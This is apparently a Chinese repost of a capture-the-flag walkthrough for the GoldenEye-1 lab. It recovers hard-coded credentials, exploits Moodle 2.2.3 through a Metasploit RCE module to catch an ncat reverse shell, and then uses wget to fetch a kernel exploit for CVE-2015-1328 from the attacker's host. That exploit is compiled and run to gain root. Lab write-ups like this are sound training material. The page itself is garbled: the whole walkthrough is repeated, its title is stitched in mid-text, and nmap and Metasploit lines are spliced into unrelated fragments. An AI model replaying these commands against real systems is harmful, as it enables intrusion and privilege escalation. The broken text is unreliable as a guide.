GoldenEye项目一是否为原创作品?

2026-05-22 11:101阅读0评论SEO问题
  • 内容介绍
  • 文章标签
  • 相关推荐

本文共计1366个文字,预计阅读时间需要6分钟。

GoldenEye项目一是否为原创作品?

实战流程+1,使用nmap查找本段IP中存活的机器+└──(root)─[~]──>┌(whoami)└── Desktop→

实战流程

1,通过nmap查找本段IP中存活的机器

┌──(root㉿whoami)-[/home/whoami/Desktop]

└─# nmap -sP 192.168.186.0/24

排查网关和已知地址,得出靶机的ip是192.168.186.138,接下来扫描端口

┌──(root㉿whoami)-[/home/whoami/Desktop]

└─# nmap 192.168.186.138

访问80端口的页面

2,根据提示进行访问,发现需要用户名和密码

3,那就继续返回主页想办法找用户名和密码

js中提供了3个关键信息,一段url编码和2个用户名

获得用户名:

boris

natalya

获得密码:InvincibleHack3r

密码url decode下

InvincibleHack3r

逐个尝试,发现最终账号密码

boris/InvincibleHack3r

4,观察登陆页面,发现对方已将 pop3 服务配置为在非常高的非默认端口上运行

既然上面说了有非默认的端口在运行一个活动的pop3服务,因此进行nmap全端口扫描

(-p-:全端口扫描 -p3306:仅仅扫描3306端口)

nmap -p- 192.168.186.138

Starting Nmap 7.92 ( nmap.org ) at 2022-05-14 04:31 EDT

Nmap scan report for 192.168.186.138 (192.168.186.138)

Host is up (0.00053s latency).

Not shown: 65531 closed tcp ports (reset)

PORT STATE SERVICE

25/tcp open smtp

80/tcp open severnaya-station.com/dir007key/for-007.jpg

根据邮件提示让我们检查图片内容,下载图片后,我们可以使用:

binwalk(路由逆向分析工具)

exiftool(图虫)

strings(识别动态库版本指令)

等查看jpg文件底层内容!

发现了base64编码的隐藏内容eFdpbnRlcjE5OTV4IQ==

使用Burpsuite破解获得密码:xWinter1995x!

线索中说,这是管理员用户的密码。管理员用户身份继续登陆应用程序。

用户名:admin

密码:xWinter1995x!

severnaya-station.com/gnocertdir

进去内容太多了,花了很多时间查看,图片红框显示和我前面使用dr_doak用户登陆邮箱发现的结果一致。

这是Moodle使用的2.2.3版本,搜索了网上的可用漏洞。

Moodle 2.2.3 exp cve --> CVE-2013-3630 漏洞可利用! 29324

15、此版本有许多漏洞利用,由于我们需要在目标计算机上进行shell访问,因此我选择使用远程代码执行(RCE)漏洞利用。

msfconsole ---进入MSF框架攻击界面

search moodle ---查找 moodle类型 攻击的模块

use 1 ---调用0 exploit/multi/nmap.org/ncat )

Ncat: Listening on :::6666

Ncat: Listening on 0.0.0.0:6666

Ncat: Connection from 192.168.186.138.

Ncat: Connection from 192.168.186.138:35301.

/bin/sh: 0: can't access tty; job control turned off

$

以上两种获得shell的方式都可以,2选一即可。

16、内核提权

uname -a 查看权限!

Linux ubuntu 3.13.0-32-generic #57-Ubuntu SMP Tue Jul 15 03:51:08 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux

谷歌搜索:Linux ubuntu 3.13.0-32 exploit

获得exp版本:37292

www.exploit-db.com/exploits/37292

--------------------------------------------------

CVE(CAN) ID: CVE-2015-1328

overlayfs文件系统是一种叠合式文件系统,实现了在底层文件系统上叠加另一个文件系统。Linux 内核3.18开始已经加入了对overlayfs的支持。Ubuntu Linux内核在更早的版本就已加入该支持。

Ubuntu Linux内核的overlayfs文件系统实现中存在一个权限检查漏洞,本地普通用户可以获取管理员权限。此漏洞影响所有目前官方支持的Ubuntu Linux版本,目前已经发布攻击代码,建议受影响用户尽快进行升级。

此漏洞源于overlayfs文件系统在上层文件系统目录中创建新文件时没有正确检查文件权限。它只检查了被修改文件的属主是否有权限在上层文件系统目录写入,导致当从底层文件系统目录中拷贝一个文件到上层文件系统目录时,文件属性也随同拷贝过去。如果Linux内核设置了CONFIG_USER_NS=y和FS_USERNS_MOUNT标志,将允许一个普通用户在低权限用户命名空间中mout一个overlayfs文件系统。本地普通用户可以利用该漏洞在敏感系统目录中创建新文件或读取敏感文件内容,从而提升到管理员权限。

---------------------------------------------------------------------------

kali搜索下:

searchsploit 37292 ---搜索kali本地的exp库中37292攻击脚本信息

┌──(root㉿whoami)-[/usr/…/exploitdb/exploits/linux/local]

└─# cp /usr/share/exploitdb/exploits/linux/local/37292.c /home/whoami/poc

这个靶场在枚举信息知道:

无法进行GCC编译,需要改下脚本为cc

gedit 37292.c ---文本打开

第143行将gcc改为cc ---编写下

然后在本目录下开启192.168.186.130:8082/37292.c ---wget下载http服务下的文件

成功下载后执行cc编译:

GoldenEye项目一是否为原创作品?

cc -o exp 37292.c ---C语言的CC代码编译点c文件

chmod +x exp ---编译成可执行文件,并赋权

./exp ---点杠执行

id ---查看目前权限

发现提权成功

cat /root/.flag.txt ---读取root下的flag信息

获取flag值

脑图汇总

我的难点

1,nmap各种细节用法的使用汇总

2,hydra工具原理的理解

3,图片内容检查工具的熟悉

4,msf中RCE脚本的利用

5,通过内核提权的方法和原理

本文共计1366个文字,预计阅读时间需要6分钟。

GoldenEye项目一是否为原创作品?

实战流程+1,使用nmap查找本段IP中存活的机器+└──(root)─[~]──>┌(whoami)└── Desktop→

实战流程

1,通过nmap查找本段IP中存活的机器

┌──(root㉿whoami)-[/home/whoami/Desktop]

└─# nmap -sP 192.168.186.0/24

排查网关和已知地址,得出靶机的ip是192.168.186.138,接下来扫描端口

┌──(root㉿whoami)-[/home/whoami/Desktop]

└─# nmap 192.168.186.138

访问80端口的页面

2,根据提示进行访问,发现需要用户名和密码

3,那就继续返回主页想办法找用户名和密码

js中提供了3个关键信息,一段url编码和2个用户名

获得用户名:

boris

natalya

获得密码:InvincibleHack3r

密码url decode下

InvincibleHack3r

逐个尝试,发现最终账号密码

boris/InvincibleHack3r

4,观察登陆页面,发现对方已将 pop3 服务配置为在非常高的非默认端口上运行

既然上面说了有非默认的端口在运行一个活动的pop3服务,因此进行nmap全端口扫描

(-p-:全端口扫描 -p3306:仅仅扫描3306端口)

nmap -p- 192.168.186.138

Starting Nmap 7.92 ( nmap.org ) at 2022-05-14 04:31 EDT

Nmap scan report for 192.168.186.138 (192.168.186.138)

Host is up (0.00053s latency).

Not shown: 65531 closed tcp ports (reset)

PORT STATE SERVICE

25/tcp open smtp

80/tcp open severnaya-station.com/dir007key/for-007.jpg

根据邮件提示让我们检查图片内容,下载图片后,我们可以使用:

binwalk(路由逆向分析工具)

exiftool(图虫)

strings(识别动态库版本指令)

等查看jpg文件底层内容!

发现了base64编码的隐藏内容eFdpbnRlcjE5OTV4IQ==

使用Burpsuite破解获得密码:xWinter1995x!

线索中说,这是管理员用户的密码。管理员用户身份继续登陆应用程序。

用户名:admin

密码:xWinter1995x!

severnaya-station.com/gnocertdir

进去内容太多了,花了很多时间查看,图片红框显示和我前面使用dr_doak用户登陆邮箱发现的结果一致。

这是Moodle使用的2.2.3版本,搜索了网上的可用漏洞。

Moodle 2.2.3 exp cve --> CVE-2013-3630 漏洞可利用! 29324

15、此版本有许多漏洞利用,由于我们需要在目标计算机上进行shell访问,因此我选择使用远程代码执行(RCE)漏洞利用。

msfconsole ---进入MSF框架攻击界面

search moodle ---查找 moodle类型 攻击的模块

use 1 ---调用0 exploit/multi/nmap.org/ncat )

Ncat: Listening on :::6666

Ncat: Listening on 0.0.0.0:6666

Ncat: Connection from 192.168.186.138.

Ncat: Connection from 192.168.186.138:35301.

/bin/sh: 0: can't access tty; job control turned off

$

以上两种获得shell的方式都可以,2选一即可。

16、内核提权

uname -a 查看权限!

Linux ubuntu 3.13.0-32-generic #57-Ubuntu SMP Tue Jul 15 03:51:08 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux

谷歌搜索:Linux ubuntu 3.13.0-32 exploit

获得exp版本:37292

www.exploit-db.com/exploits/37292

--------------------------------------------------

CVE(CAN) ID: CVE-2015-1328

overlayfs文件系统是一种叠合式文件系统,实现了在底层文件系统上叠加另一个文件系统。Linux 内核3.18开始已经加入了对overlayfs的支持。Ubuntu Linux内核在更早的版本就已加入该支持。

Ubuntu Linux内核的overlayfs文件系统实现中存在一个权限检查漏洞,本地普通用户可以获取管理员权限。此漏洞影响所有目前官方支持的Ubuntu Linux版本,目前已经发布攻击代码,建议受影响用户尽快进行升级。

此漏洞源于overlayfs文件系统在上层文件系统目录中创建新文件时没有正确检查文件权限。它只检查了被修改文件的属主是否有权限在上层文件系统目录写入,导致当从底层文件系统目录中拷贝一个文件到上层文件系统目录时,文件属性也随同拷贝过去。如果Linux内核设置了CONFIG_USER_NS=y和FS_USERNS_MOUNT标志,将允许一个普通用户在低权限用户命名空间中mout一个overlayfs文件系统。本地普通用户可以利用该漏洞在敏感系统目录中创建新文件或读取敏感文件内容,从而提升到管理员权限。

---------------------------------------------------------------------------

kali搜索下:

searchsploit 37292 ---搜索kali本地的exp库中37292攻击脚本信息

┌──(root㉿whoami)-[/usr/…/exploitdb/exploits/linux/local]

└─# cp /usr/share/exploitdb/exploits/linux/local/37292.c /home/whoami/poc

这个靶场在枚举信息知道:

无法进行GCC编译,需要改下脚本为cc

gedit 37292.c ---文本打开

第143行将gcc改为cc ---编写下

然后在本目录下开启192.168.186.130:8082/37292.c ---wget下载http服务下的文件

成功下载后执行cc编译:

GoldenEye项目一是否为原创作品?

cc -o exp 37292.c ---C语言的CC代码编译点c文件

chmod +x exp ---编译成可执行文件,并赋权

./exp ---点杠执行

id ---查看目前权限

发现提权成功

cat /root/.flag.txt ---读取root下的flag信息

获取flag值

脑图汇总

我的难点

1,nmap各种细节用法的使用汇总

2,hydra工具原理的理解

3,图片内容检查工具的熟悉

4,msf中RCE脚本的利用

5,通过内核提权的方法和原理